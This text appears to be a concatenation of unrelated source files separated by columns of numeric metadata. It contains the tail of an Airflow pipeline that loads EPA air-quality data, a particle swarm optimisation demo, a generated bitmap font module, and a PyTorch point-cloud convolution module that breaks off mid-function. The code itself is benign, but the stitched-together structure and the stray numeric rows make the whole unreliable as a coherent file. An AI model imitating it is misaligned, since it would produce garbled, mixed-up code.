        "SOURCE_URL": "{{ var.json.epa_historical_air_quality.wind_hourly_summary.source_url }}",
        "START_YEAR": "1990",
        "SOURCE_FILE": "files/data.csv",
        "PROJECT_ID": "{{ var.value.gcp_project }}",
        "DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
        "TABLE_ID": "{{ var.json.epa_historical_air_quality.wind_hourly_summary.table_id }}",
        "YEAR_FIELD_NAME": "date_local",
        "YEAR_FIELD_TYPE": "DATETIME",
        "SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.wind_hourly_summary.schema_path }}",
        "CHUNKSIZE": "{{ var.json.epa_historical_air_quality.wind_hourly_summary.chunk_size }}",
        "TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
        "TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.wind_hourly_summary.target_gcs_path }}",
        "PIPELINE_NAME": "epa_historical_air_quality - wind_hourly_summary",
        "INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
        "DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
        "OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
    },
    resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Tear down the ephemeral "epa-hist-air-quality" GKE cluster after the
# transform tasks finish (ordering enforced by the dependency chain below).
delete_cluster = kubernetes_engine.GKEDeleteClusterOperator(
    task_id="delete_cluster",
    project_id="{{ var.value.gcp_project }}",
    location="us-central1-c",
    name="epa-hist-air-quality",
)
# Task graph: create the GKE cluster first, fan out to all transform
# tasks in parallel, then delete the cluster once they have all finished.
transform_tasks = [
    annual_summaries,
    co_daily_summary,
    co_hourly_summary,
    hap_daily_summary,
    hap_hourly_summary,
    lead_daily_summary,
    no2_daily_summary,
    no2_hourly_summary,
    nonoxnoy_daily_summary,
    nonoxnoy_hourly_summary,
    ozone_daily_summary,
    ozone_hourly_summary,
    pm10_daily_summary,
    pm10_hourly_summary,
    pm25_frm_hourly_summary,
    pm25_nonfrm_daily_summary,
    pm25_nonfrm_hourly_summary,
    pm25_speciation_daily_summary,
    pm25_speciation_hourly_summary,
    pressure_daily_summary,
    pressure_hourly_summary,
    rh_and_dp_daily_summary,
    rh_and_dp_hourly_summary,
    so2_daily_summary,
    so2_hourly_summary,
    temperature_daily_summary,
    temperature_hourly_summary,
    voc_daily_summary,
    voc_hourly_summary,
    wind_daily_summary,
    wind_hourly_summary,
]
create_cluster >> transform_tasks
transform_tasks >> delete_cluster
| 96.046918
| 1,716
| 0.664205
| 12,720
| 104,403
| 5.028223
| 0.022327
| 0.044247
| 0.06254
| 0.089901
| 0.963993
| 0.959036
| 0.956175
| 0.934489
| 0.927454
| 0.923404
| 0
| 0.014185
| 0.159344
| 104,403
| 1,086
| 1,717
| 96.135359
| 0.714551
| 0.017126
| 0
| 0.610945
| 0
| 0.092537
| 0.775646
| 0.259813
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.00199
| 0
| 0.00199
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
774d0fef679794770ac8588e28df5cb8cc9749c4
| 3,980
|
py
|
Python
|
basic/fxy.py
|
rkneusel9/SwarmOptimization
|
5445b6f90ab49339ca0fdb71e98d44e6827c95a8
|
[
"MIT"
] | 2
|
2022-01-11T17:14:14.000Z
|
2022-03-07T10:22:32.000Z
|
basic/fxy.py
|
rkneusel9/SwarmOptimization
|
5445b6f90ab49339ca0fdb71e98d44e6827c95a8
|
[
"MIT"
] | null | null | null |
basic/fxy.py
|
rkneusel9/SwarmOptimization
|
5445b6f90ab49339ca0fdb71e98d44e6827c95a8
|
[
"MIT"
] | 1
|
2021-11-24T01:11:49.000Z
|
2021-11-24T01:11:49.000Z
|
#
# file: fxy.py
#
# The basic example from Chapter 2.
#
# RTK, 03-Mar-2020
# Last update: 03-Mar-2020
#
################################################################
import sys
sys.path.append("../")
import numpy as np
from PSO import *
from DE import *
from LinearInertia import *
from Bounds import *
from RandomInitializer import *
class Objective:
    """Objective function for the swarm optimizers: f(x, y) = x * y."""

    def Evaluate(self, pos):
        """Return the objective value at *pos*, a 2-element position vector."""
        x, y = pos[0], pos[1]
        return x * y
# Bounded-swarm experiments on f(x, y) = x * y over [0.01, 1]^2.
#
# Five runs: PSO with boundary clipping, three PSO runs with boundary
# resampling (varying particle counts / iteration limits), then
# differential evolution with resampling.  Output is unchanged from the
# original script.  Fixed: the per-run reporting was copy-pasted five
# times, and the initializer variable `i` was clobbered by reusing `i`
# as a loop index; the reporting is factored into _report()/_run_pso()
# and the initializer is now named `init`.

ndim = 2
tol = 1e-4


def _report(header, res):
    """Print one run's final best point and its swarm-best history."""
    x, y = res["gpos"][-1]
    g = res["gbest"][-1]
    print()
    print(header)
    print(" f(%0.8f, %0.8f) = %0.8f" % (x, y, g))
    print(" (%d swarm best updates, %d iterations)" % (len(res["gbest"]), res["iterations"]))
    print()
    print("Swarm bests:")
    for pos, best in zip(res["gpos"], res["gbest"]):
        print(" f(%0.8f, %0.8f) = %0.8f" % (pos[0], pos[1], best))
    print()


def _run_pso(npart, m, bounds):
    """Build one PSO swarm, optimize it, and return its Results() dict."""
    init = RandomInitializer(npart, ndim, bounds=bounds)
    swarm = PSO(obj=Objective(), npart=npart, ndim=ndim, init=init, tol=tol,
                max_iter=m, bounds=bounds, inertia=LinearInertia())
    swarm.Optimize()
    return swarm.Results()


# PSO with clipping
npart, m = 10, 100
res = _run_pso(npart, m, Bounds([0.01, 0.01], [1, 1]))
_report("PSO: npart, m = %d, %d (clip)" % (npart, m), res)
print()

# PSO with resampling, three (npart, max_iter) settings
for npart, m in ((10, 100), (10, 1000), (100, 100)):
    res = _run_pso(npart, m, Bounds([0.01, 0.01], [1, 1], enforce="resample"))
    _report("PSO: npart, m = %d, %d (resample)" % (npart, m), res)
    print()

# differential evolution & resampling
npart, m = 10, 100
b = Bounds([0.01, 0.01], [1, 1], enforce="resample")
init = RandomInitializer(npart, ndim, bounds=b)
swarm = DE(obj=Objective(), npart=npart, ndim=ndim, init=init, tol=tol, max_iter=m, bounds=b)
swarm.Optimize()
_report("DE: npart, m = %d, %d (resample)" % (npart, m), swarm.Results())
| 27.448276
| 116
| 0.585678
| 652
| 3,980
| 3.567485
| 0.125767
| 0.038693
| 0.034394
| 0.051591
| 0.858555
| 0.858555
| 0.858555
| 0.858555
| 0.852107
| 0.852107
| 0
| 0.048701
| 0.148744
| 3,980
| 144
| 117
| 27.638889
| 0.637839
| 0.042211
| 0
| 0.82243
| 0
| 0
| 0.253348
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009346
| false
| 0
| 0.065421
| 0.009346
| 0.093458
| 0.411215
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
91f9447ee2712cec94f6134d7f3a7ad812e091da
| 6,367
|
py
|
Python
|
port/modules/font/digiface_it_30.py
|
diskman88/mpython-desktop-robot
|
01cd15fbeeba521ab874cf66f94d3909c4f8c39a
|
[
"MIT"
] | 53
|
2018-10-15T12:01:24.000Z
|
2019-11-22T09:31:02.000Z
|
port/modules/font/digiface_it_30.py
|
diskman88/mpython-desktop-robot
|
01cd15fbeeba521ab874cf66f94d3909c4f8c39a
|
[
"MIT"
] | 10
|
2018-10-17T13:42:19.000Z
|
2019-11-25T06:42:40.000Z
|
port/modules/font/digiface_it_30.py
|
diskman88/mpython-desktop-robot
|
01cd15fbeeba521ab874cf66f94d3909c4f8c39a
|
[
"MIT"
] | 26
|
2018-12-04T03:53:39.000Z
|
2019-11-22T03:40:05.000Z
|
# Code generated by font-to-py.py.
# Font: digi_italic.ttf Char set: .0123456789:
version = '0.26'  # font-to-py generator version that produced this file


def height():
    """Return the fixed glyph height in pixels (30)."""
    return 30


def max_width():
    """Return the maximum glyph width in pixels (23)."""
    return 23


def hmap():
    """Return True — horizontal-mapping flag (font-to-py convention)."""
    return True


def reverse():
    """Return False — bit-reversal flag (font-to-py convention)."""
    return False


def monospaced():
    """Return False — glyph widths vary; see get_ch()."""
    return False


def min_ch():
    """Return the smallest character code this font covers (32)."""
    return 32


def max_ch():
    """Return the largest character code this font covers (63)."""
    return 63
_font =\
b'\x12\x00\x0f\xf8\x00\x1f\xfc\x00\x3f\xfc\x00\x1f\xfb\x00\x00\x07'\
b'\x00\x00\x07\x00\x00\x07\x00\x00\x07\x00\x00\x0e\x00\x00\x0e\x00'\
b'\x00\x0e\x00\x00\x0e\x00\x0f\xee\x00\x17\xf4\x00\x13\xf8\x00\x1b'\
b'\xc0\x00\x38\x00\x00\x38\x00\x00\x38\x00\x00\x38\x00\x00\x38\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x70\x00\x00\x70\x00\x00\x70\x00\x00'\
b'\xe0\x00\x00\xe0\x00\x00\xe0\x00\x00\xe0\x00\x00\x0c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x70\x70\x70\xf0\xe0\xe0\x15\x00\x00\x7f\xe0\x00'\
b'\xff\xe0\x02\xff\xf0\x06\xff\xf8\x0e\x00\x38\x0e\x00\x78\x0e\x00'\
b'\x78\x0e\x00\x70\x1c\x00\x70\x1c\x00\x70\x1c\x00\x70\x1c\x00\xe0'\
b'\x18\x00\xe0\x30\x00\x20\x00\x00\x00\x00\x00\x20\x30\x00\xc0\x78'\
b'\x01\xc0\x70\x01\xc0\x70\x01\xc0\x70\x03\xc0\x70\x03\x80\xe0\x03'\
b'\x80\xe0\x03\x80\xe0\x03\x80\xe0\x07\x00\xdf\xfb\x00\x3f\xfe\x00'\
b'\x3f\xf8\x00\x1f\xf0\x00\x15\x00\x01\x00\x00\x01\x00\x00\x03\x00'\
b'\x00\x07\x00\x00\x07\x00\x00\x0e\x00\x00\x0e\x00\x00\x0e\x00\x00'\
b'\x0e\x00\x00\x1e\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x0c'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x38\x00\x00\x78\x00'\
b'\x00\x70\x00\x00\x70\x00\x00\x70\x00\x00\x70\x00\x00\xe0\x00\x00'\
b'\xe0\x00\x00\xe0\x00\x00\xe0\x00\x00\x60\x00\x00\x40\x00\x00\x00'\
b'\x00\x00\x16\x00\x00\x7f\xe0\x00\xff\xe0\x03\xff\xe8\x07\xff\xd8'\
b'\x00\x00\x38\x00\x00\x38\x00\x00\x38\x00\x00\x38\x00\x00\x38\x00'\
b'\x00\x70\x00\x00\x70\x00\x00\x70\x03\xff\x70\x0f\xff\xf0\x1f\xff'\
b'\xc0\x07\xff\x00\x70\x00\x00\x78\x00\x00\x70\x00\x00\x70\x00\x00'\
b'\x70\x00\x00\xf0\x00\x00\xe0\x00\x00\xe0\x00\x00\xe0\x00\x00\xe0'\
b'\x00\x00\xdf\xfc\x00\xbf\xfc\x00\x3f\xfe\x00\x1f\xff\x00\x16\x00'\
b'\x01\xff\xe0\x01\xff\xf0\x00\xff\xf8\x00\x7f\xf8\x00\x00\x38\x00'\
b'\x00\x38\x00\x00\x38\x00\x00\x38\x00\x00\x78\x00\x00\x70\x00\x00'\
b'\x70\x00\x00\x70\x03\xff\xf0\x07\xff\xf0\x0f\xff\xc0\x03\xff\x00'\
b'\x00\x00\x60\x00\x00\xe0\x00\x01\xc0\x00\x01\xc0\x00\x01\xc0\x00'\
b'\x01\xc0\x00\x03\xc0\x00\x03\x80\x00\x03\x80\x00\x03\x80\x0f\xfb'\
b'\x00\x1f\xfe\x00\x3f\xfc\x00\x7f\xf8\x00\x15\x00\x10\x00\x10\x10'\
b'\x00\x10\x18\x00\x30\x3c\x00\x70\x38\x00\xe0\x38\x00\xe0\x38\x00'\
b'\xe0\x38\x00\xe0\x70\x01\xe0\x70\x01\xc0\x70\x01\xc0\x70\x01\xc0'\
b'\x63\xff\xc0\xcf\xff\xc0\x3f\xff\xc0\x1f\xff\x00\x00\x01\x80\x00'\
b'\x07\x80\x00\x07\x00\x00\x07\x00\x00\x07\x00\x00\x07\x00\x00\x0f'\
b'\x00\x00\x0e\x00\x00\x0e\x00\x00\x0e\x00\x00\x0e\x00\x00\x0c\x00'\
b'\x00\x04\x00\x00\x00\x00\x17\x00\x00\x3f\xfc\x00\x7f\xf8\x01\x7f'\
b'\xf0\x03\x7f\xe0\x07\x00\x00\x07\x00\x00\x07\x00\x00\x07\x00\x00'\
b'\x0e\x00\x00\x0e\x00\x00\x0e\x00\x00\x0e\x00\x00\x0c\x7f\xe0\x19'\
b'\xff\xf8\x07\xff\xf8\x03\xff\xe0\x00\x00\x30\x00\x00\x70\x00\x00'\
b'\xe0\x00\x00\xe0\x00\x00\xe0\x00\x00\xe0\x00\x00\xe0\x00\x01\xc0'\
b'\x00\x01\xc0\x00\x01\xc0\x0f\xfd\x80\x3f\xff\x00\x7f\xfc\x00\xff'\
b'\xf8\x00\x16\x00\x00\x7f\xf8\x00\xff\xf0\x02\xff\xe0\x06\xff\xc0'\
b'\x0e\x00\x00\x0e\x00\x00\x0e\x00\x00\x0e\x00\x00\x1c\x00\x00\x1c'\
b'\x00\x00\x1c\x00\x00\x1c\x00\x00\x18\xff\xc0\x33\xff\xf0\x0f\xff'\
b'\xf0\x07\xff\xc0\x30\x00\x60\x78\x00\xe0\x70\x01\xc0\x70\x01\xc0'\
b'\x70\x01\xc0\x70\x01\xc0\xe0\x01\xc0\xe0\x03\x80\xe0\x03\x80\xe0'\
b'\x03\x80\xdf\xfb\x00\x3f\xfe\x00\x3f\xf8\x00\x1f\xf0\x00\x15\x00'\
b'\x7f\xfe\x00\x7f\xfc\x80\x3f\xf9\x00\x1f\xf3\x00\x00\x07\x00\x00'\
b'\x07\x00\x00\x07\x00\x00\x0e\x00\x00\x0e\x00\x00\x0e\x00\x00\x0e'\
b'\x00\x00\x1e\x00\x00\x1c\x00\x00\x04\x00\x00\x00\x00\x00\x04\x00'\
b'\x00\x08\x00\x00\x38\x00\x00\x38\x00\x00\x38\x00\x00\x78\x00\x00'\
b'\x70\x00\x00\x70\x00\x00\x70\x00\x00\x70\x00\x00\xe0\x00\x00\xe0'\
b'\x00\x00\x60\x00\x00\x20\x00\x00\x00\x00\x15\x00\x00\x7f\xe0\x00'\
b'\xff\xe0\x02\xff\xf0\x06\xff\xf8\x0e\x00\x38\x0e\x00\x38\x0e\x00'\
b'\x78\x0e\x00\x70\x1c\x00\x70\x1c\x00\x70\x1c\x00\x70\x1c\x00\xe0'\
b'\x18\xff\xe0\x33\xff\xf0\x0f\xff\xf0\x07\xff\xe0\x30\x00\xc0\x78'\
b'\x01\xc0\x70\x01\xc0\x70\x01\xc0\x70\x03\xc0\x70\x03\x80\xe0\x03'\
b'\x80\xe0\x03\x80\xe0\x03\x80\xe0\x07\x00\xdf\xfb\x00\x3f\xfe\x00'\
b'\x3f\xf8\x00\x1f\xf0\x00\x16\x00\x00\x7f\xe0\x00\xff\xe0\x02\xff'\
b'\xf0\x06\xff\xf8\x0e\x00\x38\x0e\x00\x38\x0e\x00\x78\x0e\x00\x70'\
b'\x1c\x00\x70\x1c\x00\x70\x1c\x00\x70\x1c\x00\xe0\x1c\x7f\xe0\x31'\
b'\xff\xf8\x0f\xff\xf8\x03\xff\xe0\x00\x00\x40\x00\x01\xc0\x00\x01'\
b'\xc0\x00\x01\xc0\x00\x03\xc0\x00\x03\x80\x00\x03\x80\x00\x03\x80'\
b'\x00\x03\x80\x00\x07\x00\x1f\xfb\x00\x3f\xfe\x00\x7f\xf8\x00\xff'\
b'\xf0\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0e\x0e'\
b'\x0e\x0e\x1c\x1c\x00\x00\x00\x00\x00\x00\x00\x78\x70\x70\x70\x70'\
b'\xf0\xe0'
_index =\
b'\x00\x00\x5c\x00\x5c\x00\x9a\x00\x00\x00\x5c\x00\x00\x00\x5c\x00'\
b'\x00\x00\x5c\x00\x00\x00\x5c\x00\x00\x00\x5c\x00\x00\x00\x5c\x00'\
b'\x00\x00\x5c\x00\x00\x00\x5c\x00\x00\x00\x5c\x00\x00\x00\x5c\x00'\
b'\x00\x00\x5c\x00\x00\x00\x5c\x00\x00\x00\x5c\x00\x9a\x00\xba\x00'\
b'\x00\x00\x5c\x00\xba\x00\x16\x01\x16\x01\x72\x01\x72\x01\xce\x01'\
b'\xce\x01\x2a\x02\x2a\x02\x86\x02\x86\x02\xe2\x02\xe2\x02\x3e\x03'\
b'\x3e\x03\x9a\x03\x9a\x03\xf6\x03\xf6\x03\x52\x04\x52\x04\x72\x04'\
b'\x00\x00\x5c\x00\x00\x00\x5c\x00\x00\x00\x5c\x00\x00\x00\x5c\x00'\
b'\x00\x00\x5c\x00'
_mvfont = memoryview(_font)


def get_ch(ch):
    """Look up one character's glyph.

    Returns (bitmap, 30, width): a zero-copy memoryview over the glyph
    bytes, the glyph height, and the glyph width read from the table.
    Characters outside the supported code range fall back to slot 63.
    """
    code = ord(ch)
    code = code + 1 if 32 <= code <= 63 else 63
    # Each index entry is two little-endian u16 offsets into _font.
    base = 4 * (code - 32)
    start = int.from_bytes(_index[base:base + 2], 'little')
    end = int.from_bytes(_index[base + 2:base + 4], 'little')
    # The first two bytes of a glyph record hold its pixel width.
    width = int.from_bytes(_font[start:start + 2], 'little')
    return _mvfont[start + 2:end], 30, width
| 52.188525
| 78
| 0.687608
| 1,468
| 6,367
| 2.966621
| 0.081063
| 0.39403
| 0.245924
| 0.245235
| 0.690471
| 0.650976
| 0.572445
| 0.534558
| 0.49667
| 0.46039
| 0
| 0.353314
| 0.059369
| 6,367
| 121
| 79
| 52.619835
| 0.373852
| 0.012251
| 0
| 0.140187
| 1
| 0.738318
| 0.827575
| 0.820114
| 0
| 1
| 0
| 0
| 0
| 1
| 0.074766
| false
| 0
| 0
| 0.065421
| 0.149533
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
62298a7ef72f43769dc524f9fdf4cdabea2013ad
| 8,087
|
py
|
Python
|
fpconv/fpconv.py
|
lyqun/FPConv
|
9fc3a71258550101bec671330c5e97b45725291c
|
[
"MIT"
] | 129
|
2020-03-13T11:47:18.000Z
|
2022-03-01T16:33:47.000Z
|
fpconv/fpconv.py
|
lyqun/FPConv
|
9fc3a71258550101bec671330c5e97b45725291c
|
[
"MIT"
] | 20
|
2020-03-13T12:41:06.000Z
|
2021-10-06T11:29:05.000Z
|
fpconv/fpconv.py
|
lyqun/FPConv
|
9fc3a71258550101bec671330c5e97b45725291c
|
[
"MIT"
] | 18
|
2020-03-14T13:19:41.000Z
|
2022-02-25T04:50:30.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.parameter import Parameter
from fpconv.pointnet2 import pointnet2_utils
from fpconv.pointnet2 import pytorch_utils as pt_utils
from fpconv import base
# Negative slope shared by every LeakyReLU activation in this module.
relu_alpha = 0.2
class FPConv4x4_BaseBlock(nn.Module):
    """Flat-projection convolution block with a flattened 4x4 (16-cell) map.

    Groups neighbours of each (optionally FPS-sampled) centre, predicts
    per-neighbour projection weights, projects neighbour features onto the
    map, and convolves the map down to ``out_channel`` features.
    """

    def __init__(self, npoint, nsample, radius, in_channel, out_channel, bn=True, use_xyz=False):
        """
        :param npoint: number of centres to sample with FPS; None keeps the input cloud
        :param nsample: neighbours gathered per centre
        :param radius: ball-query radius used by the grouper
        :param in_channel: input feature channels
        :param out_channel: output feature channels
        :param bn: use batch norm inside the sub-modules
        :param use_xyz: concatenate xyz coordinates onto the grouped features
        """
        super().__init__()
        print('fpconv4x4 init:', npoint, nsample, radius, in_channel, out_channel)
        self.npoint = npoint
        self.nsample = nsample
        self.keep_pcd = npoint is None  # no downsampling when npoint is unset
        self.use_xyz = use_xyz
        self.grouper = pointnet2_utils.QueryAndGroupLocal(radius, nsample)
        self.wts_layer = base.ProjWeightModule(mlp_pn=[8, 16], mlp_wts=[16], map_size=4, bn=bn)
        if use_xyz:
            in_channel += 3
        # kernel (16, 1) collapses all 16 map cells per centre at once.
        self.proj_conv = pt_utils.Conv2d(in_size=in_channel,
                                         out_size=out_channel,
                                         kernel_size=(16, 1),
                                         bn=bn,
                                         activation=nn.LeakyReLU(negative_slope=relu_alpha, inplace=True))

    def forward(self, xyz, features, new_xyz=None):
        '''
        :param xyz: B,N,3 input point coordinates
        :param features: B,C,N input point features
        :param new_xyz: optional pre-sampled centres, B,np,3
        :returns:
            new_xyz: B,np,3
            new_feats: B,C_new,np
        '''
        # sample new xyz (furthest-point sampling) unless centres are given
        if not self.keep_pcd and new_xyz is None:
            xyz_flipped = xyz.transpose(1, 2).contiguous()  # B,3,N
            idx = pointnet2_utils.furthest_point_sample(xyz, self.npoint)  # B,npoint
            new_xyz_flipped = pointnet2_utils.gather_operation(xyz_flipped, idx)  # B,3,npoint
            new_xyz = new_xyz_flipped.transpose(1, 2).contiguous()  # B,npoint,3
        elif new_xyz is not None:
            self.npoint = new_xyz.size(1)
        else:  # keep pcd
            new_xyz = xyz
            self.npoint = new_xyz.size(1)

        # get per-neighbour projection weights
        grouped_xyz, grouped_feats = self.grouper(xyz, new_xyz, features)
        proj_wts = self.wts_layer(grouped_xyz)  # B,ml,np,ns
        if self.use_xyz:
            grouped_feats = torch.cat([grouped_xyz, grouped_feats], dim=1)

        # normalize weights
        # NOTE(review): torch.tensor(...).cuda() hard-codes CUDA tensors — confirm GPU-only use.
        # normalize at dim 1 <ml>
        proj_wts2_ = proj_wts ** 2  # B, ml, np, ns
        proj_wts_sum = torch.sum(proj_wts2_, dim=1, keepdim=True)  # B, 1, np, ns
        proj_wts_sum = torch.max(proj_wts_sum, torch.tensor(1e-8).cuda())  # floor: avoid div-by-zero
        proj_wts_sum = torch.sqrt(proj_wts_sum)  # B, 1, np, ns
        proj_wts = proj_wts / proj_wts_sum
        # normalize at dim 3 <nsample>
        proj_wts_sum = torch.sum(proj_wts2_, dim=3, keepdim=True)  # B,ml,np,1
        proj_wts_sum = torch.max(proj_wts_sum, torch.tensor(1e-8).cuda())
        proj_wts_sum = torch.sqrt(proj_wts_sum)  # B,ml,np,1 (comment fixed: was "B, 1, np, ns")
        proj_wts_sum = torch.max(proj_wts_sum, torch.tensor(1.0).cuda())  # only ever shrink weights
        proj_wts = proj_wts / proj_wts_sum  # B,ml,np,ns

        # projection
        proj_wts = proj_wts.transpose(1, 2)  # B, np, ml, ns
        grouped_feats = grouped_feats.permute(0, 2, 3, 1)  # B, C, np, ns => B, np, ns, C
        # Fixed: the original computed proj_wts.matmul(grouped_feats) twice —
        # once into an unused local `multi` — doubling the matmul cost.
        proj_feats = F.leaky_relu(proj_wts.matmul(grouped_feats), negative_slope=relu_alpha, inplace=True)  # B, np, ml, C
        proj_feats = proj_feats.transpose(1, 3)  # B, C, ml, np

        # convolution
        proj_feats = self.proj_conv(proj_feats)  # B, C_new, 1, np
        proj_feats = proj_feats.squeeze(2)  # B, C_new, np
        return new_xyz, proj_feats
class FPConv6x6_BaseBlock(nn.Module):
    """Flat-projection convolution block using a 6x6 projection map.

    Same overall pipeline as FPConv4x4_BaseBlock, but projects neighbour
    features onto a 6x6 map (plus a learned bias) and convolves the map
    with a stack of three 3D convolutions.
    """

    def __init__(self, npoint, nsample, radius, in_channel, out_channel, bn=True, use_xyz=False):
        # npoint=None means "keep the input point cloud" (no FPS sampling).
        super().__init__()
        print('fpconv6x6 init:', npoint, nsample, radius, in_channel, out_channel)
        self.npoint = npoint
        self.map_size = 6
        self.map_len = self.map_size ** 2  # 36 projection-map cells
        self.nsample = nsample
        self.keep_pcd = npoint is None
        self.use_xyz = use_xyz
        self.grouper = pointnet2_utils.QueryAndGroupLocal(radius, nsample)
        self.wts_layer = base.ProjWeightModule(mlp_pn=[8,16,16], mlp_wts=[16,32], map_size=6, bn=bn)
        if use_xyz:
            in_channel += 3
        # Learned bias added to the projected features before activation.
        self.bias = Parameter(torch.Tensor(in_channel))
        mid_channel = in_channel
        # NOTE(review): the second Conv3d takes in_size=in_channel; this only
        # matches the first conv's output because mid_channel == in_channel
        # here — confirm intent before ever changing mid_channel.
        self.proj_conv = nn.Sequential(
            pt_utils.Conv3d(in_size=in_channel,
                            out_size=mid_channel,
                            kernel_size=(3,3,1),
                            bn=bn,
                            activation=nn.LeakyReLU(negative_slope=relu_alpha, inplace=True)),
            pt_utils.Conv3d(in_size=in_channel,
                            out_size=mid_channel,
                            kernel_size=(3,3,1),
                            bn=bn,
                            activation=nn.LeakyReLU(negative_slope=relu_alpha, inplace=True)),
            pt_utils.Conv3d(in_size=mid_channel,
                            out_size=out_channel,
                            kernel_size=(2,2,1),
                            bn=bn,
                            activation=nn.LeakyReLU(negative_slope=relu_alpha, inplace=True)))
        self.reset_parameters()

    def reset_parameters(self):
        # Small negative initial bias (constant chosen by the original authors).
        nn.init.constant_(self.bias, -0.05)

    def forward(self, xyz, features, new_xyz=None):
        '''
        :param xyz: B,N,3
        :param features: B,C,N
        :param new_xyz: optional pre-sampled centres, B,np,3
        :returns:
            new_xyz: B,np,3
            new_feats: B,C_new,np
        '''
        # sample new xyz unless centres were supplied
        if not self.keep_pcd and new_xyz is None:
            xyz_flipped = xyz.transpose(1, 2).contiguous() # B,3,npoint
            idx = pointnet2_utils.furthest_point_sample(xyz, self.npoint) # B,npoint
            new_xyz_flipped = pointnet2_utils.gather_operation(xyz_flipped, idx) # B,3,npoint
            new_xyz = new_xyz_flipped.transpose(1, 2).contiguous() # B,npoint,3
        elif new_xyz is not None:
            idx = None
            self.npoint = new_xyz.size(1)
        else:  # keep pcd
            idx = None
            new_xyz = xyz
            self.npoint = new_xyz.size(1)
        # get per-neighbour projection weights
        grouped_xyz, grouped_feats = self.grouper(xyz, new_xyz, features)
        proj_wts = self.wts_layer(grouped_xyz) # B,ml,np,ns
        if self.use_xyz:
            grouped_feats = torch.cat([grouped_xyz, grouped_feats], dim=1)
        # normalize weights
        # NOTE(review): torch.tensor(...).cuda() hard-codes CUDA tensors — confirm GPU-only use.
        # normalize at dim 1 <ml>
        proj_wts2_ = proj_wts ** 2 # B, ml, np, ns
        proj_wts_sum = torch.sum(proj_wts2_, dim=1, keepdim=True) # B, 1, np, ns
        proj_wts_sum = torch.max(proj_wts_sum, torch.tensor(1e-8).cuda())  # floor: avoid div-by-zero
        proj_wts_sum = torch.sqrt(proj_wts_sum) # B, 1, np, ns
        proj_wts = proj_wts / proj_wts_sum
        # normalize at dim 3 <nsample> (reuses proj_wts2_, the pre-dim-1 squares)
        proj_wts_sum = torch.sum(proj_wts2_, dim=3, keepdim=True) # B,ml,np,1
        proj_wts_sum = torch.max(proj_wts_sum, torch.tensor(1e-8).cuda())
        proj_wts_sum = torch.sqrt(proj_wts_sum) # B,ml,np,1
        proj_wts_sum = torch.max(proj_wts_sum, torch.tensor(1.0).cuda())  # only ever shrink weights
        proj_wts = proj_wts / proj_wts_sum # B,ml,np,ns
        # projection
        proj_wts = proj_wts.transpose(1,2) # B, np, ml, ns
        grouped_feats = grouped_feats.permute(0, 2, 3, 1) # B, C, np, ns => B, np, ns, C
        proj_feats = F.leaky_relu(proj_wts.matmul(grouped_feats) + self.bias, negative_slope=relu_alpha, inplace=True) # B, np, ml, C
        # reshape projection features # B, np, ml, C => B, C, ms, ms, np
        bs = proj_feats.size(0)
        proj_feats = proj_feats.transpose(1, 3) # B, C, ml, np
        proj_feats = proj_feats.view(bs, -1, self.map_size, self.map_size, self.npoint).contiguous() # B, C, ms, ms, np
        # convolution
